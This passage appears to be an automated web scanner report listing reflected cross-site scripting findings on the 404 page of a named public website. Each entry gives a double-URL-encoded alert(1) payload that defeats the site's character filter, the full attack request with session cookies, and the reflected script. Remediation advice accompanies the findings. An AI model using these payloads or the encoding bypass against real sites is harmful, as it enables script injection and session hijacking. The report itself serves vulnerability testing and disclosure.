WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content8d98b";alert(1)//f50fafc3009/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.179. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6fee%2522%253balert%25281%2529%252f%252fcc4a4981ad8 was submitted in the REST URL parameter 2. This input was echoed as e6fee";alert(1)//cc4a4981ad8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the requested URL is written verbatim into the string argument of the cmCreateErrorTag() call on the 404 page, so at a minimum that value must be escaped for a JavaScript string literal (encoding quotes, backslashes, slashes and other non-alphanumeric characters as \xHH or \uHHHH sequences) before it is emitted into the script. There should be no need to URL-decode the value of REST URL parameter 2 a second time, as the web server has already decoded the path once; that second decode is what lets the double-encoded payload pass the character filter. In any case, the application should perform its input validation only after all decoding and custom canonicalisation has been carried out.

Request

GET /content/sigma-aldriche6fee%2522%253balert%25281%2529%252f%252fcc4a4981ad8/customer-support/customer-service/services/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldriche6fee";alert(1)//cc4a4981ad8/customer-support/customer-service/services/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.180. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4197%2522%253balert%25281%2529%252f%252f2e03a9fdba0 was submitted in the REST URL parameter 3. This input was echoed as c4197";alert(1)//2e03a9fdba0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-supportc4197%2522%253balert%25281%2529%252f%252f2e03a9fdba0/customer-service/services/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-supportc4197";alert(1)//2e03a9fdba0/customer-service/services/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.181. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82c73%2522%253balert%25281%2529%252f%252fd11d6131daa was submitted in the REST URL parameter 4. This input was echoed as 82c73";alert(1)//d11d6131daa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service82c73%2522%253balert%25281%2529%252f%252fd11d6131daa/services/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:40 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service82c73";alert(1)//d11d6131daa/services/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.182. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d593c%2522%253balert%25281%2529%252f%252fd73e4680211 was submitted in the REST URL parameter 5. This input was echoed as d593c";alert(1)//d73e4680211 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/servicesd593c%2522%253balert%25281%2529%252f%252fd73e4680211/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:43 GMT
Content-Length: 29006
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/servicesd593c";alert(1)//d73e4680211/facility-operations/chemical-handling","E404") ;
   </script>
...[SNIP]...

1.183. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be459%2522%253balert%25281%2529%252f%252fe9d7d10188d was submitted in the REST URL parameter 6. This input was echoed as be459";alert(1)//e9d7d10188d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/facility-operationsbe459%2522%253balert%25281%2529%252f%252fe9d7d10188d/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; 